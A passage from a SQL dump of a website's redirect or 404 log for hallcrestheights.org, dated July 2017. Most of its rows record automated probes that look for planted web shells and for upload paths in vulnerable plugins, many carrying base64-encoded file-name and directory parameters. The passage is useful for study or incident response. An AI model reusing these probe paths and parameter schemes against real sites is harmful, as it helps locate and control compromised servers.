00:00:00'),(11250,'http://hallcrestheights.org/bin/logo_img.php',NULL,'http://hallcrestheights.org/bin/logo_img.php','',22,0,'2017-07-18 05:54:01','0000-00-00 00:00:00'),(11251,'http://hallcrestheights.org/logo_img.php',NULL,'http://hallcrestheights.org/logo_img.php','',9,0,'2017-07-18 06:54:26','0000-00-00 00:00:00'),(11252,'http://hallcrestheights.org/logs/system_info.php',NULL,'http://hallcrestheights.org/logs/system_info.php','',1,0,'2017-07-18 06:53:12','0000-00-00 00:00:00'),(11253,'http://hallcrestheights.org/media/system_info.php',NULL,'http://hallcrestheights.org/media/system_info.php','',1,0,'2017-07-18 08:03:07','0000-00-00 00:00:00'),(11254,'http://hallcrestheights.org/libraries/system_info.php',NULL,'http://hallcrestheights.org/libraries/system_info.php','',7,0,'2017-07-18 09:10:45','0000-00-00 00:00:00'),(11255,'http://hallcrestheights.org/tmp/system_info.php',NULL,'http://hallcrestheights.org/tmp/system_info.php','',1,0,'2017-07-18 09:17:00','0000-00-00 00:00:00'),(11256,'http://hallcrestheights.org/language/system_info.php',NULL,'http://hallcrestheights.org/language/system_info.php','',1,0,'2017-07-18 10:22:42','0000-00-00 00:00:00'),(11257,'http://hallcrestheights.org/cache/system_info.php',NULL,'http://hallcrestheights.org/cache/system_info.php','',1,0,'2017-07-18 14:43:35','0000-00-00 00:00:00'),(11258,'http://hallcrestheights.org/includes/system_info.php',NULL,'http://hallcrestheights.org/includes/system_info.php','',1,0,'2017-07-19 00:22:40','0000-00-00 00:00:00'),(11259,'http://hallcrestheights.org/logs/logo_img.php',NULL,'http://hallcrestheights.org/logs/logo_img.php','',4,0,'2017-07-19 03:44:35','0000-00-00 00:00:00'),(11260,'http://hallcrestheights.org/plugins/system_info.php',NULL,'http://hallcrestheights.org/plugins/system_info.php','',1,0,'2017-07-19 11:31:55','0000-00-00 00:00:00'),(11261,'http://hallcrestheights.org/media/logo_img.php',NULL,'http://hallcrestheights.org/media/logo_img.php','',5,0,'2017-07-20 13:43:14','0000-00-00 00:00:00'),(11262,'http://hallcrestheights.org/modules/logo_img.php',NULL,'http://hallcrestheights.org/modules/logo_img.php','',8,0,'2017-07-20 18:10:44','0000-00-00 00:00:00'),(11263,'http://hallcrestheights.org/images/system_info.php',NULL,'http://hallcrestheights.org/images/system_info.php','',1,0,'2017-07-21 13:49:24','0000-00-00 00:00:00'),(11264,'http://hallcrestheights.org//images/1ndex.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-22 03:35:44','0000-00-00 00:00:00'),(11265,'http://hallcrestheights.org//sqlbak.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:35:46','0000-00-00 00:00:00'),(11266,'http://hallcrestheights.org//email.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:35:49','0000-00-00 00:00:00'),(11267,'http://hallcrestheights.org//functions.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:34:34','0000-00-00 00:00:00'),(11268,'http://hallcrestheights.org//cache/news.php?z3=aERFYk5uLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:00','0000-00-00 00:00:00'),(11269,'http://hallcrestheights.org//tmp.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-07-22 03:34:46','0000-00-00 00:00:00'),(11270,'http://hallcrestheights.org//shootme.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:09','0000-00-00 00:00:00'),(11271,'http://hallcrestheights.org//configurationbak.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:12','0000-00-00 00:00:00'),(11272,'http://hallcrestheights.org//robots.txt.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:17','0000-00-00 00:00:00'),(11273,'http://hallcrestheights.org//jconfig.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:35:01','0000-00-00 00:00:00'),(11274,'http://hallcrestheights.org//media/reads.php?z3=aERFYk5uLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:24','0000-00-00 00:00:00'),(11275,'http://hallcrestheights.org//media/1ndex.php?z3=aERFYk5uLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:28','0000-00-00 00:00:00'),(11276,'http://hallcrestheights.org//sql_dump.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:31','0000-00-00 00:00:00'),(11277,'http://hallcrestheights.org//images/laj.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:36','0000-00-00 00:00:00'),(11278,'http://hallcrestheights.org//media/404.php?z3=aERFYk5uLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:43','0000-00-00 00:00:00'),(11279,'http://hallcrestheights.org//media/tmp.php?z3=aERFYk5uLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:46','0000-00-00 00:00:00'),(11280,'http://hallcrestheights.org//r3x.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:50','0000-00-00 00:00:00'),(11281,'http://hallcrestheights.org//log.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:54','0000-00-00 00:00:00'),(11282,'http://hallcrestheights.org//images/stories/0day.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:58','0000-00-00 00:00:00'),(11283,'http://hallcrestheights.org//includes/u2p.php?z3=aERFYk5uLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:02','0000-00-00 00:00:00'),(11284,'http://hallcrestheights.org//images/xxx.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:05','0000-00-00 00:00:00'),(11285,'http://hallcrestheights.org//al277.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:08','0000-00-00 00:00:00'),(11286,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=aERFYk5uLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:35:52','0000-00-00 00:00:00'),(11287,'http://hallcrestheights.org//install.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:14','0000-00-00 00:00:00'),(11288,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=aERFYk5uLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:35:59','0000-00-00 00:00:00'),(11289,'http://hallcrestheights.org//robot.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:23','0000-00-00 00:00:00'),(11290,'http://hallcrestheights.org//wsdl.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:29','0000-00-00 00:00:00'),(11291,'http://hallcrestheights.org//goog1es.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:35','0000-00-00 00:00:00'),(11292,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=aERFYk5uLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:37','0000-00-00 00:00:00'),(11293,'http://hallcrestheights.org//update.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:21','0000-00-00 00:00:00'),(11294,'http://hallcrestheights.org//includes.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:24','0000-00-00 00:00:00'),(11295,'http://hallcrestheights.org//wp-main.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:48','0000-00-00 00:00:00'),(11296,'http://hallcrestheights.org//news.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:53','0000-00-00 00:00:00'),(11297,'http://hallcrestheights.org//images/al277.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:36','0000-00-00 00:00:00'),(11298,'http://hallcrestheights.org//webconfig.txt.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:36:41','0000-00-00 00:00:00'),(11299,'http://hallcrestheights.org//cache/cachee.php?z3=aERFYk5uLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:08','0000-00-00 00:00:00'),(11300,'http://hallcrestheights.org//thumb.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:11','0000-00-00 00:00:00'),(11301,'http://hallcrestheights.org//SessionController.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:22','0000-00-00 00:00:00'),(11302,'http://hallcrestheights.org//maill.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:26','0000-00-00 00:00:00'),(11303,'http://hallcrestheights.org//error-log.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:32','0000-00-00 00:00:00'),(11304,'http://hallcrestheights.org//authenticating.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:36','0000-00-00 00:00:00'),(11305,'http://hallcrestheights.org//google-assist.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:40','0000-00-00 00:00:00'),(11306,'http://hallcrestheights.org//images/google-assist.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:44','0000-00-00 00:00:00'),(11307,'http://hallcrestheights.org//images/robots.txt.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:48','0000-00-00 00:00:00'),(11308,'http://hallcrestheights.org//elements.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:51','0000-00-00 00:00:00'),(11309,'http://hallcrestheights.org//xmlsrpc.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:57','0000-00-00 00:00:00'),(11310,'http://hallcrestheights.org//wp-cache.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:37:42','0000-00-00 00:00:00'),(11311,'http://hallcrestheights.org//images/404.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:06','0000-00-00 00:00:00'),(11312,'http://hallcrestheights.org//images/head.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:09','0000-00-00 00:00:00'),(11313,'http://hallcrestheights.org//cache/support.php?z3=aERFYk5uLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:12','0000-00-00 00:00:00'),(11314,'http://hallcrestheights.org//RoseLeif.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:16','0000-00-00 00:00:00'),(11315,'http://hallcrestheights.org//Abbrevsprl.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:00','0000-00-00 00:00:00'),(11316,'http://hallcrestheights.org//show.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:22','0000-00-00 00:00:00'),(11317,'http://hallcrestheights.org//images/defau1t.php?z3=aERFYk5uLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:07','0000-00-00 00:00:00'),(11318,'http://hallcrestheights.org//cli/40dd1d.php?z3=aERFYk5uLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:29','0000-00-00 00:00:00'),(11319,'http://hallcrestheights.org//infos.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:35','0000-00-00 00:00:00'),(11320,'http://hallcrestheights.org//cache/defau1t.php?z3=aERFYk5uLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:39','0000-00-00 00:00:00'),(11321,'http://hallcrestheights.org//bookmark.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:43','0000-00-00 00:00:00'),(11322,'http://hallcrestheights.org//configbak.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:48','0000-00-00 00:00:00'),(11323,'http://hallcrestheights.org//wp-data.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:51','0000-00-00 00:00:00'),(11324,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:39:55','0000-00-00 00:00:00'),(11325,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:39','0000-00-00 00:00:00'),(11326,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:02','0000-00-00 00:00:00'),(11327,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:38:46','0000-00-00 00:00:00'),(11328,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:09','0000-00-00 00:00:00'),(11329,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:13','0000-00-00 00:00:00'),(11330,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:16','0000-00-00 00:00:00'),(11331,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:19','0000-00-00 00:00:00'),(11332,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:23','0000-00-00 00:00:00'),(11333,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=aERFYk5uLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:28','0000-00-00 00:00:00'),(11334,'http://hallcrestheights.org//cache/list.php?z3=aERFYk5uLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:32','0000-00-00 00:00:00'),(11335,'http://hallcrestheights.org//bgeiis.php?z3=aERFYk5uLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-22 03:40:35','0000-00-00 00:00:00'),(11336,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/hDEbNn.php',NULL,'','',1,0,'2017-07-22 03:41:43','0000-00-00 00:00:00'),(11337,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/hDEbNn.php',NULL,'','',1,0,'2017-07-22 03:40:26','0000-00-00 00:00:00'),(11338,'http://hallcrestheights.org//wp-content/uploads/hDEbNn.php',NULL,'','',1,0,'2017-07-22 03:41:48','0000-00-00 00:00:00'),(11339,'http://hallcrestheights.org//hDEbNn.php',NULL,'','',1,0,'2017-07-22 03:41:49','0000-00-00 00:00:00'),(11340,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/hDEbNn.php',NULL,'','',1,0,'2017-07-22 03:41:52','0000-00-00 00:00:00'),(11341,'http://www.hallcrestheights.org/k40400-dvisciwb-i20162629-vwkux-krbzomsm-vuclzup.htm',NULL,'','',1,0,'2017-07-26 04:07:20','0000-00-00 00:00:00'),(11342,'http://www.hallcrestheights.org/events/7-press/6-community-spirit-is-hallcrest-s-hallmark.html',NULL,'','',6,0,'2017-07-26 19:03:21','0000-00-00 00:00:00'),(11343,'http://hallcrestheights.org/wp-content/bk.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:27:54','0000-00-00 00:00:00'),(11344,'http://hallcrestheights.org/images/1ndex.php?z3=SFNuNVV0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:30:49','0000-00-00 00:00:00'),(11345,'http://hallcrestheights.org/configbak.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:30:57','0000-00-00 00:00:00'),(11346,'http://hallcrestheights.org/cache/cachee.php?z3=SFNuNVV0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:31:58','0000-00-00 00:00:00'),(11347,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:32:21','0000-00-00 00:00:00'),(11348,'http://hallcrestheights.org/maill.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:31:04','0000-00-00 00:00:00'),(11349,'http://hallcrestheights.org/wp-cache.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:32:28','0000-00-00 00:00:00'),(11350,'http://hallcrestheights.org/robot.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:32:56','0000-00-00 00:00:00'),(11351,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:32:57','0000-00-00 00:00:00'),(11352,'http://hallcrestheights.org/SessionController.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:33:00','0000-00-00 00:00:00'),(11353,'http://hallcrestheights.org/webconfig.txt.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:33:04','0000-00-00 00:00:00'),(11354,'http://hallcrestheights.org/robots.txt.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:33:48','0000-00-00 00:00:00'),(11355,'http://hallcrestheights.org/sql_dump.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:33:54','0000-00-00 00:00:00'),(11356,'http://hallcrestheights.org/jconfig.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:33:56','0000-00-00 00:00:00'),(11357,'http://hallcrestheights.org/thumb.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:35:19','0000-00-00 00:00:00'),(11358,'http://hallcrestheights.org/xmlrpc-activate.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:35:43','0000-00-00 00:00:00'),(11359,'http://hallcrestheights.org/al277.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:35:44','0000-00-00 00:00:00'),(11360,'http://hallcrestheights.org/images/al277.php?z3=SFNuNVV0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:35:46','0000-00-00 00:00:00'),(11361,'http://hallcrestheights.org/wsdl.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:35:49','0000-00-00 00:00:00'),(11362,'http://hallcrestheights.org/wp-data.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:35:53','0000-00-00 00:00:00'),(11363,'http://hallcrestheights.org/media/1ndex.php?z3=SFNuNVV0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:35:33','0000-00-00 00:00:00'),(11364,'http://hallcrestheights.org/media/tmp.php?z3=SFNuNVV0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:36:55','0000-00-00 00:00:00'),(11365,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:35:41','0000-00-00 00:00:00'),(11366,'http://hallcrestheights.org/google-assist.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:38:01','0000-00-00 00:00:00'),(11367,'http://hallcrestheights.org/cache/defau1t.php?z3=SFNuNVV0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:40:12','0000-00-00 00:00:00'),(11368,'http://hallcrestheights.org/roubt.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:39:25','0000-00-00 00:00:00'),(11369,'http://hallcrestheights.org/bookmark.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:40:48','0000-00-00 00:00:00'),(11370,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:42:18','0000-00-00 00:00:00'),(11371,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:42:19','0000-00-00 00:00:00'),(11372,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=SFNuNVV0LnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:42:45','0000-00-00 00:00:00'),(11373,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:43:07','0000-00-00 00:00:00'),(11374,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:43:09','0000-00-00 00:00:00'),(11375,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:43:12','0000-00-00 00:00:00'),(11376,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:43:14','0000-00-00 00:00:00'),(11377,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/spy.php',NULL,'','',1,0,'2017-07-27 17:42:00','0000-00-00 00:00:00'),(11378,'http://hallcrestheights.org/modules/modules/modules.php?z3=SFNuNVV0LnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:44:17','0000-00-00 00:00:00'),(11379,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:43:00','0000-00-00 00:00:00'),(11380,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:44:22','0000-00-00 00:00:00'),(11381,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:44:02','0000-00-00 00:00:00'),(11382,'http://hallcrestheights.org/sqlbak.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:45:45','0000-00-00 00:00:00'),(11383,'http://hallcrestheights.org/email.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:44:57','0000-00-00 00:00:00'),(11384,'http://hallcrestheights.org/images/stories/0day.php?z3=SFNuNVV0LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:44:58','0000-00-00 00:00:00'),(11385,'http://hallcrestheights.org/install.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:46:21','0000-00-00 00:00:00'),(11386,'http://hallcrestheights.org/goog1es.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:46:44','0000-00-00 00:00:00'),(11387,'http://hallcrestheights.org/error-log.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:47:07','0000-00-00 00:00:00'),(11388,'http://hallcrestheights.org/xmlsrpc.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:47:08','0000-00-00 00:00:00'),(11389,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:47:11','0000-00-00 00:00:00'),(11390,'http://hallcrestheights.org/shootmei.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:47:14','0000-00-00 00:00:00'),(11391,'http://hallcrestheights.org/Abbrevsprl.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:50:22','0000-00-00 00:00:00'),(11392,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:50:50','0000-00-00 